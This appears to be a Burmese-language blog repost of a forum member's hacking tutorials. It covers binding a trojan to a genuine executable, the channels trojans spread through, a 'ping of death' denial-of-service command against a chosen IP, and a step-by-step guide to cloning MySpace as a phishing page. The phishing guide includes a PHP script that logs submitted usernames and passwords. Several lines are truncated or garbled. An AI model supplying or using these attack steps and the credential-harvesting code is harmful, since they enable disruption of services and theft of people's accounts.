Server ဆိုတဲ့ Trojan နှင့် အမှန်အကန် File တစ်ခုကို ပေါင်းစပ်ပြီး Output File တစ်ခုအနေနှင့် ပြုလုပ်ပေးနိုင်တဲ့ Programs တွေရှိပါတယ်။ ထို Software တွေက File တစ်ခုအနေနှင့်ထုတ်ပေးပါတယ်။ ဥပမာအနေနဲ့ တင်စားရရင် ဖျော်ရည်ထဲကို ဆေးခပ်သလိုပေါ့ဗျာ။ ဥပမာ Coke နှင့် ခေါင်းခါဆေး ရောထားတာကို ကြိုက်တဲ့အမည်တပ်လို့ရသလို ပေါ့ ဟက်ကာကလဲ ဒီလိုလုပ်ပါလိမ့်မယ်
Chess.exe + netbuserver.exe = or အနေနှင့်ထပ်ပေးလို့ရပါတယ်။ ဒါက Chess.exe အစစ်တော့မဟုတ်ဘူး ဒါပေမဲ့ Chess.exe ပါပဲ။ ကွဲပြားပုံကို အသိသာဆုံးက File Size နဲ့ ဆုံးဖြတ်လို့ရပါတယ်။
The original file: chess.exe size: 50,000 bytes
The new file (with Trojan): chess.exe size: 65,000 bytes
ဒါကို ဟက်ကာ တစ်ယောက်ဟာ တစ်ယောက်ယောက်ဆီပို့လို့ရအောင် ၁၀ စက္ကန့်အတွင်း လုပ်ယူလို့ရပါတယ်။ ဒါဆိုရင် netbuserver.exe ပါနေတဲ့ chess.exe ကို နှိပ်လိုက်ရင် စာဖတ်သူကွန်ပျုတာ ပေါ်မှာဖွင့်လိုက်ရင် ဘာဖြစ်မလဲ။
အဖြေကတော့ chess game က ပုံမှန်အတိုင်းပဲ ပွင့်လာပါလိမ့်မယ်။ ဒီအကြိမ်မှာတော့ စာဖတ်သူက သံသယဖြစ်မှာ မဟုတ်ပါဘူး ဘာဖြစ်လို့လဲဆိုတော့ စာဖတ်သူထင်တဲ့အတိုင်း ပေါ်လာလို့ပါ။ ဒါပေမဲ့ စာဖတ်သူ မသိလိုက်တာကတော့ chess game ပွင့်လိုက်တဲ့ အချိန်မှာပဲ netbuserver.exe ကိုတစ်ခါတည်း သွင်းပြီးသားဖြစ်ပါတယ်။
Trojan ဖြင့် ထိခိုက်ခံရတဲ့ ကွန်ပျုတာဟာ ဒီ အချက်အလက်တွေကို ဟက်ကာဆီပြန်ပို့ပါလိမ့်မယ်။
Username : ဟက်ကာတွေက စာဖတ်သူကို ခေါ်တဲ့ Nickname ပါ။
IP Add : စာဖတ်သူ ကွန်ရက်ကို ဆက်သွယ်ရင်ရတဲ့ လိပ်စာပါ။
Status : စာဖတ်သူ Online လား Offline လား ကို ဟက်ကာကို အသိပေးနိုင်ပါတယ်။
ဒါကြောင့် Dial Up ပဲဖြစ်ဖြစ် အရေးမကြီးပါဘူး။ ကွန်ရက်နှင့် ချိတ်ဆက်မှုရှိတာနဲ့ Program က သူ့ဘာသာသူ အသိပေးမှာပါ။ စာဖတ်သူက ဒါတွေဘယ်လိုဖြစ်နိုင်မလဲ မေးခွန်းရှိပါလိမ့်မယ်။ အပေါ်မှာ ဖေါ်ပြထားတာက ဘယ်လိုထိန်းချုပ်နိုင်လဲထဲက နည်းလမ်းတစ်ချို့ပါ။
ခုဆက်လက်ရေးမှာကတော့ ဟက်ကာတွေက စာဖတ်သူဆီ trojans တွေဘယ်လိုပို့နိုင်လဲ ဆိုတာပါ။
News Group
မြန်မာပြည်က လူတွေကတော့ အသုံးပြုတဲ့လူရှားမှာပါ။ Articles တွေကို Newsgroup မှာတင်ပြီး Attachment တွေကို ဖွင့်ကြည့်ရန် လိမ်လှည်ထားခြင်း
Forums
ဒါကတော့ အထူးတလည် ရှင်းပြစရာမလိုဘူးထင်ပါတယ်။ ကျွှန်တော်တို့ မြန်မာဆိုင်ဘာမှာတော့ ဒါတွေမရှိပါဘူး။ ဒါပေမဲ့ တစ်ချို့ကျွှန်တော်သုံးတဲ့တစ်ခြာ
Chat Channels (IRCs) and Instand Messengers (IMs such as GTlak, MSN, Jabbers, and Yahoo)
တစ်ချို့ Chat Server တွေမှာ Join တာနှင့် File Name.exe၊ File Name.jpg.vbs ဆိုပြီး File တွေ မိမိကွန်ပျုတာကို ပို့ခံနိုင်ရပါတယ်။ သတိမထားမိတဲ့ အချိန်မှာ နှိပ်မိသွားနိုင်ပါတယ်။ IMs တွေကတော့ ခုချိန်မှာ အများဆုံးပို့တဲ့ နေရာတွေပါ။ ဝမ်းနည်းဖို့ကောင်းတာက စစ်တမ်းတစ်ချို့အရ 80% အသုံးပြုသူတွေဟာ သတိမထားမိပါဘူး။ ဥပမာ အနေနှင့် thayetmyo ဆိုပြီးလား Gtalk ကနေ ပြန့်တဲ့ Vrius လား၊ Worm လား၊ မသိခေတ်စားလိုက်ပါသေးတယ်။ ကျွှန်တော်ကတော့ တစ်ခါမှ မခံရတော့ ဘာအမျိုးအစားလဲ မသိလိုက်ပါဘူး။
ဒါကတော့ ကျွှန်တော် အထူးတလည် မပြောတော့ပါဘူး။
Unsafe Web Sites
တစ်ချို့ Official မဟုတ်တဲ့ site တွေမှာ အများဆုံးတွေ့ရပါတယ်။ အဲလိုမျိုး Site ကနေ Download လုပ်လိုက်တဲ့ file တွေကို ဂရုထားသင့်ပါတယ်။
စကားချပ် - မပူပါနဲ့ ဒီမှာ Cracked Software တွေ ဒိုင်ခံတင်ပေးတဲ့ ကိုဖက်ဆီ၊ ကိုကောင်း၊ ကိုကောင်လေး နှင့် ဘဘဗိုင်းရပ်စ်တို့ အရင်ခံရမှာပါ။
မြင်တဲ့အတိုင်း ဒါကဖြန့်ဝေလို့ရတဲ့ နည်းတွေထဲက တစ်ချို့ပါ။ အဲ နောက်ဆုံး ကျွှန်တော်စဉ်းစားမိတာကတော့ Social Networking Sites တွေကပါ။ ဥပမာ Friendster, Facebook, and My Space လိုမျိုးတွေကပါ။ ဟိုတစ်လောတုန်းကတောင် ဘော်ဘော်တစ်ယောက်ရဲ့ ကောင်မလေးစက် Friendster ကနေ တစ်ဆင့် Injected လုပ်ခံရတာကို မှတ်မှတ်ရရ Clean ပေးလိုက်ရပါသေးတယ်။
ဒီ ဒုတိယ အခန်းကို ဖတ်ပြီးတော့ စာဖတ်သူအရင်ကထက် ကွန်ရက်ပေါ်က အလားအလာရှိတဲ့ အန္တရာယ်တွေကို ပိုပြီးသတိထားမိလာမယ်လို့ မျော်လင့်ပါတယ်။ နောက်တစ်ခန်းမှာတော့ ဘယ်လို file အမျိုးအစားတွေကို လက်ခံနိုင်လဲရင် အန္တရာယ်နည်းလဲကို ပြောပြပါသွားမယ်။
ခုတော့ မနက် ၄ နာရီ ထိုးပြီ ဆိုတော့ အိပ်ြပီဗျီု့။
ဟက်ကာများဧ။် လျှို့ဝှက်ချက် ကို ဖော်ထုတ်ခြင်းနှင့် မျှဝေခြင်း (၃)....
- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုခြင်းဖြစ်ပါတယ်ကိုယ်တိုက်ခိုက်လိုသောသူ၏ services များကိုပိတ်ပင်ခြင်းတစ်နည်းအာြး
ဆောင်နိုင်အောင်ရပ်ဆိုင်းပစ်ြ
- End-user systems, servers, routers နဲ့ Website စတာတွေကိုတိုက်ခိုက်နိုင်ပါတယ်
- တိုက်ခိုက်ဖို့အတွက်လိုအပ်ချက်
၁. Command Prompt (CMD or DOS) windows system မှာပါလာပြီးသားဖြစ်ပါတယ်
၂. တိုက်ခိုက်လိုသော ကွန်ပျုတာ သို့ website ၏ IP address
- Website ၏ IP address ကိုဘယ်လိုရနိုင်မလည်းဆိုရင်
၁. CMD ကိုဖွင့်ပါ
၂. Nslookup website name ရိုက်ထည့်ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss ကျလာပါလိမ့်မည်။
- စတင်တိုက်ခိုက်ခြင်း
၁. CMD ကိုဖွင့်ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို့ရိုက်ထည့်ပါ။ (Site-IP နေရာတွင်တိုက်ခိုက်
လိုသည့်ကွန်ပျုတာ (သို့) website ၏ IP address ကိုရိုက်ထည့်ရပါမည်။)
Site-IP = နေရာတွင်တိုက်ခိုက် လိုသည့်ကွန်ပျုတာ (သို့) website ၏ IP address
ကိုရိုက်ထည့်ရပါမည်။
-n 10000000 = အကြိမ်10000000 တိုက်ခိုက်မည်ဟုပြောခြင်းဖြစ်
ကိုပြောင်းလဲနိုင်ပါတယ်
-w 0.00001 = တစ်ကြိမ်တိုက်ခိုက်ပြီးနောက်ဘယ်
မှာလည်းကိုပြောခြင်းပါတယ်
သတိပြုရမှာကတော့ -l, -n နဲ့ -w တွေကိုဖြုတ်ပြီးသုံးရင်တိုက်ခို
- အခုလိုတိုက်ခိုက်ခြင်းကို “PING OF DEATH” လို့လည်းခေါ်ပါတယ် ။
အခုပြောမှာက Myspace Webpage အတုဖန်တီးမှာဖြစ်ပါတယ်။ တစ်စုံတစ်ဦးကိုနစ်နာလိုသောရည်
ပါ။ နည်းပညာကိုပိုစိတ်ဝင်စားလာစေရန်
Phishing ဆိုတာဘာလည်း ?
Web site အတုတွေကိုဖန်တီးတာပေါ့။ Identify theft ဆိုရင်လည်းမမှားပါဘူး
အပြည့်အစုံဖတ်ရန်
Web site အတုဆိုတာကိုနားမလည်ဘူး
Web site အတုဆိုတာနာမည်ကြီးတဲ့ website တွေကိုသူ့ပုံစံအတိုင်းဖန်တီးထား
ဘာလို့ဖန်တီးတာလည်း ?
ဥပမာပြောရရင် gmail ပုံစံ site တစ်ခုဖန်တီးလိုက်မယ်ဆိုပါစို့…
အဲဒီ web site အတုနဲ့သွားဝင်မိရင် ကိုယ့် gmail user name နဲ့ password တွေပါသွားပြီပေါ့
ဘယ်လိုဖန်တီးမှာလည်း ?
ပထမဆုံး website အတုဖန်တီးချင်တဲ့ တကယ့် site ကိုသွားပါ
MySpace site ကိုဖန်တီးချင်တယ်ဆိုပါဆို့ http://myspace.com ကိုသွားပါ
Webpage ရဲ့ source ကို ကြည့်ပါ။ နောက်ပြီး copy လုပ်ပါ
အခုသင့်မှာ webpage ရဲ့ source ရှိနေပြီဆိုရင်…အဲဒါတွေကို web hosting တစ်ခုခုမှာတင်လိုက်ပါ
အဲဒီ hosting ဟာ php enable ဖြစ်ရပါမယ်
Web hosting မှာတင်ပြီး index.html ဆိုတဲ့ file အနေနဲ့ save လုပ်ပါ
Index.html နဲ့ save လိုက်ရင် default home page ဖြစ်သွားမှာမို့လို့ပါ
Php scriptတစ်ခုတည်ဆောက်ပါမယ်။ ဘာလို့လည်းဆိုရင်သင့် webpage အတွက် log fileတစ်ခုဖန်တီးချင်လို့ရယ်၊ နောက်ပြီး တကယ့် websiteကိုလမ်းကြောင်းပြောင်းသွ
Notepad ကိုဖွင့်ပါ log.txt ဆိုတဲ့ file name နဲ့ save လုပ်ပါ
Index.html ကို upload လုပ်ထားတဲ့ site မှာဘဲသွားပြီး upload လုပ်ပါ
Php script နဲ့ပတ်သက်လို့လေ့လာချင်ရင်တော့ ဒီ site တွေကိုသွားပါ
www.tizag.com, www.w3schools.com, မှာသွားရောက်လေ့လာနိုင်ပါတယ်
header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
အပေါ်ကပြထားတဲ့ code တွေကို Notepad ပေါ်မှာရေးချပြီး redirect.php ဆိုတဲ့နာမည်နဲ့ သိမ်းလိုက်ပါ
နောက် upload လုပ်ပါ
Index.html မှာပြင်စရာလေးတွေကျန်နေသေးပါတယ်
action= ကိုရှာပါ။ action နဲ့ပတ်သက်တာတွေကအများကြီးပါ အဓိကလိုချင်တာက user name နဲ့ password
တွေကိုဘယ်မှာသွားကြည့် တယ်ဆိုတဲ့လမ်းကြောင်းကိုသိချင်
index file ထဲမှာထပ်ရှာလိုက်ပါအုန်း။
action ထဲမှာပါဝင်တဲ့စာသားတွေကိုဖျက်ြ
အခုဆိုရင်တော့သင်ဟာ webpage အတုတစ်ခုကိုတည်ဆောက်ပြီးသွားပြါ
မှတ်ချက် /
မြန်မာဆိုင်ဘာဖိုရမ်မှ Special Member တဦးဖြစ်သူ ကိုသီဟ (thiha1myat ) ၏ ပို့စ်အား ကူးယူဖေါ်ပြခြင်းဖြစ်ပါသည် ။ သိလိုသည်များရှိပါက မေးမြန်းနိုင်ပါတယ် ။ ကိုသီဟမှ ပြန်လည်ဖြေကြားသွားမှာ ဖြစ်ပါတယ် ။